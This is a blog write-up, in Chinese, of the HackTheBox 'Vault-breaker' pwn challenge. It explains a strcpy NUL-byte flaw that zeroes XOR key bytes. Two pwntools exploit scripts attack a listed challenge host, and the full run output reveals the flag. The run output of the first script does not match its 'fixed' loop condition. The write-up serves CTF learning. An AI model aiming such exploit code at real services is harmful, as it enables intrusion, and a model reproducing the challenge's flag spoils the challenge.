HackTheBox-Challenges Vault-breaker Writeup

kazma 成大資安社 創辦人/社長

Exploitation

這題保護全開,然後程式主邏輯如下:

/*
 * Generate a fresh XOR key into the global random_key (declared elsewhere;
 * its size is not visible in this listing).
 *
 * Flow: prompt for a key length until a value <= 31 is entered, fill key_buf
 * with that many bytes from /dev/urandom, re-draw any byte that came out as
 * zero, then strcpy() the buffer into random_key.
 *
 * Returns the stack-canary XOR value from the decompiled epilogue; the
 * function has no meaningful return value of its own.
 *
 * Security note: strcpy() stops at the first NUL.  key_buf[input_num] is
 * still 0 from the memset below, so the terminator is written to
 * random_key[input_num] and any bytes after it in random_key keep their old
 * contents.  A zero key byte leaves the corresponding vault byte equal to the
 * plaintext under XOR.  Copying a fixed 32 non-zero bytes with memcpy()
 * instead would close this.
 */
unsigned __int64 new_key_gen()
{
    int random_fd; // eax
    int random_fd2; // eax
    unsigned __int64 i; // [rsp+8h] [rbp-58h]
    unsigned __int64 input_num; // [rsp+10h] [rbp-50h]
    FILE *random_fp; // [rsp+18h] [rbp-48h]
    char key_buf[40]; // [rsp+20h] [rbp-40h] BYREF
    unsigned __int64 v7; // [rsp+48h] [rbp-18h]

    v7 = __readfsqword(0x28u); // stack canary, re-checked at return
    i = 0LL;
    input_num = 34LL; // above 0x1F so the prompt loop below runs at least once
    random_fp = fopen("/dev/urandom", "rb");
    if ( !random_fp )
    {
        fprintf(stdout, "\n%sError opening /dev/urandom, exiting..\n", "\x1B[1;31m");
        exit(21);
    }
    // Re-prompt until the entered length is at most 31 (0 is accepted).
    while ( input_num > 0x1F )
    {
        printf("\n[*] Length of new password (0-%d): ", 31LL);
        input_num = read_num();
    }
    memset(key_buf, 0, 0x20uLL); // clear the 32 bytes the key can occupy; key_buf[input_num] stays 0
    random_fd = fileno(random_fp);
    read(random_fd, key_buf, input_num); // return value unchecked; positions a short read leaves unfilled are still 0 and get re-drawn below
    // Replace every zero byte within the first input_num positions so the key
    // itself never contains a NUL.
    while ( i < input_num )
    {
        while ( !key_buf[i] )
        {
            random_fd2 = fileno(random_fp);
            read(random_fd2, &key_buf[i], 1uLL);
        }
        ++i;
    }
    // Copies input_num bytes plus the NUL terminator into random_key; see the
    // security note above.
    strcpy(random_key, key_buf);
    fclose(random_fp);
    printf("\n%s[+] New key has been genereated successfully!\n%s", "\x1B[1;32m", "\x1B[1;34m");
    return __readfsqword(0x28u) ^ v7; // canary check
}

這邊的問題是它讓我們自己決定密鑰長度 input_num,但複製時用的是 strcpy 而不是 memcpy:key_buf 先被 memset 清成 0,隨機位元組只填滿前 input_num 個位置,所以 strcpy 複製完這些位元組後,會把結尾的 null byte 一起寫進 random_key[input_num],之後的位元組則維持原值。我們因此可以透過不同的密鑰長度來控制 null byte 的位置;而程式做的只是把 random key 跟 flag 做 xor,任何位元組 xor 0 都不會改變。

Exploit

這邊提供兩種解法:

  1. 第一種是先把密鑰長度設為 0,這樣 random key 的第一個位元組就會是 null byte,輸出的 Vault 第一個位元組也就是 flag 的第一個字元;以此類推,把長度從 0 設到 31,每次多 leak 一個字元,就可以得到整個 flag:
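    import warnings

    from pwn import *

    warnings.filterwarnings("ignore", category=BytesWarning)

    # Leak the flag one byte per connection.
    # new_key_gen() copies the key with strcpy, so asking for a key length of
    # len(flag) leaves random_key[len(flag)] == 0; that position of the vault
    # output is then the plaintext flag byte.
    flag = b"HTB{"

    # The original condition `flag[-1] != b"}"` never becomes false: indexing a
    # bytes object yields an int, which never equals the bytes b"}", so the
    # loop kept appending the trailing newlines.  Compare with endswith instead.
    while not flag.endswith(b"}"):
        # The tube closes itself when the with-block exits, also on error.
        with remote("94.237.52.225", 39459) as r:
            r.sendlineafter(b"> ", b"1")
            r.sendlineafter(b": ", str(len(flag)).encode())
            r.sendlineafter(b"> ", b"2")
            r.recvuntil(b"Vault: ")
            # recvn() blocks until exactly n bytes arrive; recv(n) may return fewer.
            r.recvn(len(flag))
            flag += r.recvn(1)
        print(flag)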
    執行結果:
    └─$ python vault.py
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4n'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_k'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_ku'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kud'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudu'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudur'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudur0'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudur0r'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudur0r0'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudur0r0r'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudur0r0r0'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudur0r0r0}'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudur0r0r0}\n'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudur0r0r0}\n\n'
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    [*] Closed connection to 94.237.52.225 port 39459
    b'HTB{d4nz4_kudur0r0r0}\n\n\n'
    迴圈沒有正常終止:flag[-1] 取出的是 int,跟 b"}" 比較永遠不相等,加上 flag 後面還有換行,所以會一直多收位元組;可以改成 endswith 之類的。
  2. 第二種是把密鑰長度從 31 依序設回 0,每次都會在 random_key[長度] 的位置留下 null byte,最後整個 random key 都是 null byte:
    import warnings

    from pwn import *

    warnings.filterwarnings("ignore", category=BytesWarning)

    r = remote("94.237.52.225", 39459)


    def request_key_length(length):
        """Pick menu option 1 and answer the key-length prompt with *length*."""
        r.sendlineafter(b"> ", "1")
        r.sendlineafter(b": ", str(length))


    # Request key lengths 31, 30, ..., 0 in turn.  Each new_key_gen() call
    # writes strcpy's terminator at random_key[length]; stepping the length
    # down leaves random_key[0..31] all zero, so the vault output XORs the
    # flag with nothing.
    for i in reversed(range(32)):
        print(f"{i=}")
        request_key_length(i)

    r.sendlineafter(b"> ", "2")
    r.recvuntil(b"Vault: ")
    r.interactive()
    執行結果:
    └─$ python vault2.py
    [+] Opening connection to 94.237.52.225 on port 39459: Done
    i=31
    i=30
    i=29
    i=28
    i=27
    i=26
    i=25
    i=24
    i=23
    i=22
    i=21
    i=20
    i=19
    i=18
    i=17
    i=16
    i=15
    i=14
    i=13
    i=12
    i=11
    i=10
    i=9
    i=8
    i=7
    i=6
    i=5
    i=4
    i=3
    i=2
    i=1
    i=0
    [*] Switching to interactive mode
    HTB{d4nz4_kudur0r0r0}

Pwned

pwn

  • Title: HackTheBox-Challenges Vault-breaker Writeup
  • Author: kazma
  • Created at : 2024-11-07 00:39:57
  • Updated at : 2024-11-07 09:17:22
  • Link: https://kazma.tw/2024/11/07/HackTheBox-Challenges-Vault-breaker-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.